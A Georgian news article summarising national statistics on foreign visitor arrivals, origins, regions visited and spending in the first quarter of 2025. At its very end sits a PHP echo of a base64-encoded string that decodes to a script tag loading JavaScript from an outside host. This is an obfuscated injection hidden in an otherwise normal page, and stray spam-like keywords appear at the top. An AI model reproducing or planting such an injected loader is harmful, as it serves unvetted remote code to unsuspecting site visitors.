gorgia
ავერსი jaluzi

სტატისტიკის ეროვნული სამსახურის მონაცემებით, 2025 წლის პირველ კვარტალში საქართველოს ტერიტორიაზე დაფიქსირდა საერთაშორისო არარეზიდენტი მოგზაურების 1.3 მილიონი შემოსვლა, რაც 1.1 პროცენტით მეტია წინა წლის ანალოგიური პერიოდის მაჩვენებელზე.

შემოსვლების უდიდესი ნაწილი, 47.4 პროცენტი, განხორციელდა 31-50 წლის მოგზაურების მიერ. აღნიშნული რაოდენობიდან საერთაშორისო ვიზიტორების მიერ განხორციელებული ვიზიტების რაოდენობამ 1.2 მილიონი შეადგინა, რაც 1.3 პროცენტით მეტია 2024 წლის ანალოგიური პერიოდის მაჩვენებელზე.

საქსტატის ცნობით, 2025 წლის პირველ კვარტალში საერთაშორისო ვიზიტორების რაოდენობამ 970.5 ათასს მიაღწია, რაც 1.3 პროცენტით მეტია წინა წლის ანალოგიური პერიოდის მაჩვენებელზე. საანგარიშო პერიოდში საერთაშორისო ვიზიტორების მიერ განხორციელდა 958.9 ათასი ტურისტული ტიპის ვიზიტი, რაც 2.2 პროცენტით მეტია წინა წლის ანალოგიური პერიოდის მაჩვენებელზე. საერთაშორისო ვიზიტორების 82.6 პროცენტი მხოლოდ ტურისტები იყვნენ. მხოლოდ ექსკურსანტების წილმა 13.7 პროცენტი შეადგინა, ხოლო ვიზიტორების 3.7 პროცენტი იყო როგორც ტურისტი, ასევე ექსკურსანტი.

ამასთან, უწყების ანგარიშით, 2025 წლის პირველ კვარტალში ვიზიტორების ყველაზე დიდი რაოდენობა, 187.7 ათასი, დაფიქსირდა რუსეთის ფედერაციიდან, რაც ვიზიტორების ჯამური რაოდენობის 19.3 პროცენტს შეადგენს. მეორე ადგილზეა თურქეთი 16.5%-იანი წილით, ხოლო მესამეზე – სომხეთი 13.0%-იანი წილით. ვიზიტების ყველაზე დიდი რაოდენობა – 225.3 ათასი განხორციელდა თურქეთის, 219.3 ათასი რუსეთის ფედერაციისა და 180.8 ათასი სომხეთის მოქალაქეების მიერ. ვიზიტორების უმრავლესობა, 48.8 პროცენტი, მიეკუთვნებოდა 31-50 წლამდე ასაკობრივ კატეგორიას, ქალების რაოდენობა კი მთლიანი ვიზიტორების რაოდენობის 36.5 პროცენტს შეადგენდა.

2025 წლის პირველ კვარტალში ვიზიტების ყველაზე დიდი ნაწილი, 42.2 პროცენტი, განხორციელდა დასვენების, გართობისა და რეკრეაციის მიზნით. ვიზიტების უმრავლესობა განხორციელდა თბილისსა და აჭარაში, შესაბამისად, 665.7 ათასი და 301.8 ათასი ვიზიტი.

საქსტატის ინფორმაციით, 2025 წლის პირველ კვარტალში განხორციელებული ვიზიტებისას გათეული ღამეების საშუალო რაოდენობამ 5.50 ღამე შეადგინა, რაც 2024 წლის პირველ კვარტალში დაფიქსირებულ მაჩვენებელზე (5.45 ღამე) 0.8 პროცენტით მეტია. განხორციელებული ვიზიტების 85.1 პროცენტი წარმოადგენდა განმეორებითი ხასიათის ვიზიტს.

ამასთან, მიმდინარე წლის პირველ კვარტალში განხორციელებული ვიზიტებისას გაწეული ხარჯები 2.3 მილიარდ ლარს გაუტოლდა, რაც 8.3 პროცენტით მეტია წინა წლის ანალოგიური პერიოდის მაჩვენებელზე. ვიზიტზე საშუალო ხარჯი 2024 წლის პირველ კვარტალთან შედარებით 6.9 პროცენტით გაიზარდა და 1 998.3 ლარი შეადგინა.

123
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");